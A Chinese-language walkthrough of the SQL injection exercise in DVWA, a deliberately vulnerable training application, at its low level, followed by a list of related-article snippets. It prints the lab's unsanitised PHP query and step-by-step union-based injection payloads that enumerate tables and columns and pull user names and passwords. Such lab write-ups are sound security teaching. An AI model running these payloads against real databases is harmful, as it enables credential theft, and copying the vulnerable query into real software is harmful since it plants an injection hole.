DVWA sql注入 WP
sql注入基本思路:
1.源码
2.判断数字型和字符型
3.猜测字段数
4.查询数据库中的字段
5.查询表中的字段
6.查询user表中的字段
7.拿字段中数据
low:
1.源码:
<?phpif( isset( $_REQUEST[ 'Submit' ] ) ) {// Get input$id = $_REQUEST[ 'id' ];// Check database$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );// Get resultswhile( $row = mysqli_fetch_assoc( $result ) ) {// Get values$first = $row["first_name"];$last = $row["last_name"];// Feedback for end userecho "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";}mysqli_close($GLOBALS["___mysqli_ston"]);
}?>
可以看到没有任何过滤语句
2.判断数字型和字符型:
加单引号: 1'
回显失败
加判断 1 and 1=1
回显正常
判断:1 and 1=2
,回显正常且查询成功,可判断不是数字型注入
判断:1‘ and '1'='1
,回显查询正常
判断:1’ and ‘1’='2,回显失败
说明类型为字符型注入
3.猜测字段数:
格式: order by 数字 #
数字是将这n个数字按顺序列出,#井号作用是屏蔽之后的语句
回显错误:1' order by 3 #
4.查询数据库中的字段:
union select联合查询
查询出两个字段: First name 和 Surname
5.查询表中的字段
语句:1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
group_concat : 返回结果为连接参数产生的字符串,并将group by产生的同一个分组中的值连接起来,返回一个字符串结果。
也 可以用concat函数,只是结果会分开,不如group_concat直观
结果:查询出guestbook 和 users两个表名
6.查询user表中的字段
语句:1' union select 1,group_concat(column_name)from information_schema.columns where table_name='users' #
发现敏感字段:user-id,password
7.拿字段中数据:
语句:1' union select group_concat(user),group_concat(password) from users #
除此之外,user_id中是数字序号,firstname中是用户名,last_name中是姓。。。。等等,都可以通过语句得到
dvwa 的sql模块似乎出了点问题,低中高三级都打不开了。。。。
DVWA sql注入 WP相关推荐
- 史上最详细sql注入wp
文章目录 sql注入wp(史上最详细) 前言 什么是SQL注入? SQL注入的原理 常见的注入方式 常见绕过技巧 常见防控SQL注入的方法 手工查询语句 Basic Challenges Less-1 ...
- DVWA SQL注入
DVWA SQL注入 安装及下载 dvwa. 插件等 请看上一篇文章 1.首先修改 low 2.SQL注入打开proxy switcher,如此修改 3. 打开Burp页面,关闭intercept 4 ...
- DVWA—sql注入( SQL Injection)
DVWA-sql注入( SQL Injection) 原理 将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的. 类型 数字 字符 搜索 过程 1.判断是否存在注入,注入时字符型还是数 ...
- DVWA sql注入(high)
有了前两关的基础,现在做起来,比较得心应手了 现在开始: 1.输入1' 输入1' and '1'='1 输入1' and '1'='2 由此可见,这也是一个字符型的注入 2.获取字段数 输入1' or ...
- 【ctfshow】web篇-SQL注入 wp
前言 记录web的题目wp,慢慢变强,铸剑. SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "s ...
- DVWA SQL注入攻击
SQL注入原理 SQL注入就是通过SQL命令插入到web表单递交或输入域名页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据 ...
- 通过sql注入窃取用户数据库信息
一.SQL注入的定义 SQL Injection ,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害是巨大的,常常会导 ...
- php wp foo,【翻译】WordPress WPDB SQL注入攻击(技术文档)
WordPress 4.8.3中修复了一个重要的SQL注入漏洞.漏洞是今年9月20日由Hacker-One报告的.本文主要讲了漏洞的技术细节和解决方法. 升级到最新版本 网站管理员应该升级WordPr ...
- 使用Sqlmap对dvwa进行sql注入测试(初级阶段)
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和 ...
最新文章
- SSRS 2012 聚合函数 -- 隔行换色示例
- (Mirage系列之五)Mirage经典案例之桌面驱动和基础层管理
- 03.shard_allocation_和_cluster的routing设置
- some screenshot of Fiori cloud launchpad
- makefile:2: *** 遗漏分隔符 。 停止
- D类IP地址和组播传输
- 查询中where和having的区别
- C0型单元刚度矩阵的性质
- 考研高等数学张宇30讲笔记——第十二讲 二重积分
- 有道词典【输入式翻页】
- vs2019个性化配置
- 机器学习中的忒修斯之船:那些“愚弄”专家的著名悖论
- 计算机开机速度慢是什么原因,电脑开机慢是什么原因?怎么处理?
- iOS13 sign in with Apple客户端接入遇到的一些问题
- app互斥登录,只能登录一个.
- [RFID]射频卡介绍(一)ID-EM4100
- myeclipse中怎么显示代码行号
- WRF与WPS的编译与安装
- 不用再羡慕同事有好看的财务报表啦,这里的报表模板随你用!
- 跟我一起玩《linux内核设计的艺术》第1章(四)——from setup.s to head.s,这回一定让main滚出来!(已解封)
热门文章
- springboot 通过url访问本地文件
- IDEA JDK1.8 ProGuard 混淆Maven项目代码
- SpringBoot 整合 Redis 哨兵机制_01
- jsp文字上下居中显示_微信朋友圈又有骚技巧,一键设置居中签名,好友傻眼了...
- continue详细讲解
- BugkuCTF-Crypto题easy_crypto
- 学计算机买电脑显卡1605ti够吗,铭瑄GTX1660Ti显卡值得买吗 铭瑄GTX1660Ti终结者显卡评测...
- php 断点续传 暂停,PHP 断点续传实例详解
- tp5 mysql实现消息队列_TP5系列 | Queue消息队列
- 2019matlab中的floyd,基于matlab的floyd算法详解